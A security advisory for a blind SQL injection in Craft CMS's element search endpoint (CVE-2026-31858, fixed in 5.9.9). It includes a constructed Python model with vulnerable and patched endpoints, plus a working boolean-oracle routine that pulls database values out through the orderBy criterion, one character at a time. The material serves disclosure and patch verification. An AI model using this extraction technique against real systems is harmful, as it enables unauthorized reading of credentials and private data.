Severity score: 8.7

Craft CMS's Element Search Endpoint Is Open to Blind SQL Injection

GHSA-g7j6-fmwx-7vp8 CVE-2026-31858
Summary

Any authenticated Craft CMS control panel user, with no admin rights required, can inject SQL through the `ElementSearchController::actionSearch()` endpoint by supplying `criteria[where]`, `criteria[orderBy]` or other query properties, and can read out the full database contents with boolean-based blind injection. The endpoint never received the `unset()` protection that GHSA-2453-mppf-46cj added to `ElementIndexesController`, so the earlier fix did not cover it. Update Craft CMS to the patched release, version 5.9.9.

What to do
  • Update craftcms cms to version 5.9.9.
Affected software
Vendor: craftcms
Product: cms
Affected versions: > 5.0.0-RC1, <= 5.9.8
Fix available: 5.9.9
Original title
CraftCMS's `ElementSearchController` Affected by Blind SQL Injection
Original description
The `ElementSearchController::actionSearch()` endpoint is missing the `unset()` protection that was added to `ElementIndexesController` in [GHSA-2453-mppf-46cj](https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj).

The exact same SQL injection vulnerability (including `criteria[orderBy]`, the original advisory vector) works on this controller because the fix was never applied to it.

Any authenticated control panel user (no admin required) can inject arbitrary SQL via `criteria[where]`, `criteria[orderBy]`, or other query properties, and extract the full database contents via boolean-based blind injection.

Users should update to the patched 5.9.9 release to mitigate the issue.
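The following is an added, constructed model of the bug class the advisory describes; it is not Craft CMS's code. It stands in a query object whose `where` and `orderBy` properties are spliced into SQL as raw text (the behaviour of string arguments in a Yii-style query builder), an endpoint that copies request-supplied criteria onto that object without the `unset()` step, the same endpoint with the step applied, and the attacker's side: a boolean oracle built from `criteria[orderBy]` and a per-character binary search that recovers a value from another table. The table names, rows, and the choice to strip only `where` and `orderBy` are assumptions made for the illustration.

```python
"""Constructed model of the bug class behind GHSA-g7j6-fmwx-7vp8 (not Craft CMS code)."""
import sqlite3

# Criteria keys that map straight to raw SQL and must be dropped before the rest
# reach the query object. `where` and `orderBy` are named in the advisory; which
# further keys Craft's patch strips is not stated here, so only these two are modelled.
RAW_SQL_KEYS = ("where", "orderBy")


def make_db():
    """In-memory SQLite database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE elements (id INTEGER PRIMARY KEY, title TEXT, enabled INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT);
        INSERT INTO elements VALUES (1, 'Alpha', 1), (2, 'Beta', 1), (3, 'Gamma', 1);
        INSERT INTO users VALUES (1, 'admin@example.com', 'constructed-hash');
        """
    )
    return db


class ElementQuery:
    """Minimal query-builder stand-in: `where` and `orderBy` are plain properties
    whose string values are spliced into the SQL text unquoted."""

    def __init__(self):
        self.limit = 20
        self.where = "enabled = 1"
        self.orderBy = "id ASC"

    def sql(self):
        return (
            f"SELECT id FROM elements WHERE {self.where} "
            f"ORDER BY {self.orderBy} LIMIT {int(self.limit)}"
        )


def configure(query, criteria):
    """Craft::configure-style assignment: every criteria key becomes a property."""
    for key, value in criteria.items():
        if key not in vars(query):
            raise ValueError(f"unknown criteria key {key!r}")
        setattr(query, key, value)
    return query


def action_search_vulnerable(db, criteria):
    """Endpoint as the advisory describes it: criteria applied with no unset()."""
    query = configure(ElementQuery(), criteria)
    return [row[0] for row in db.execute(query.sql())]


def action_search_fixed(db, criteria):
    """Same endpoint with the GHSA-2453-mppf-46cj-style unset() applied first."""
    safe = {k: v for k, v in criteria.items() if k not in RAW_SQL_KEYS}
    query = configure(ElementQuery(), safe)
    return [row[0] for row in db.execute(query.sql())]


# ---- attacker side: boolean-based blind extraction through criteria[orderBy] ----

def oracle(endpoint, db, condition):
    """True iff `condition` holds in the database: a true branch sorts ids
    ascending (first id is 1), a false branch sorts them descending."""
    ids = endpoint(db, {"orderBy": f"CASE WHEN ({condition}) THEN id ELSE -id END"})
    return ids[0] == 1


def oracle_is_live(endpoint, db):
    """Detection check: does the endpoint leak one bit per request?"""
    return oracle(endpoint, db, "1=1") != oracle(endpoint, db, "1=0")


def extract(endpoint, db, expr, max_len=64):
    """Recover the string `expr` evaluates to, seven requests per character, by
    binary search over its code point. Past the end of the string substr() yields
    '' and unicode('') is NULL, so the comparison is never true and lo stays 0."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(endpoint, db, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint leaks:", oracle_is_live(action_search_vulnerable, db))
    print("recovered:", extract(action_search_vulnerable, db,
                                "(SELECT email FROM users WHERE id = 1)"))
    print("fixed endpoint leaks:", oracle_is_live(action_search_fixed, db))
```

The `oracle_is_live` check is the one to reuse when verifying a deployment: send one request whose sort condition is true and one whose condition is false, and compare the order of the returned ids. On a patched endpoint the `orderBy` key is discarded before it reaches the query, so both responses are identical; legitimate keys such as `limit` still take effect.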
Vulnerability type
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Published: 11 Mar 2026 · Updated: 13 Mar 2026 · First seen: 11 Mar 2026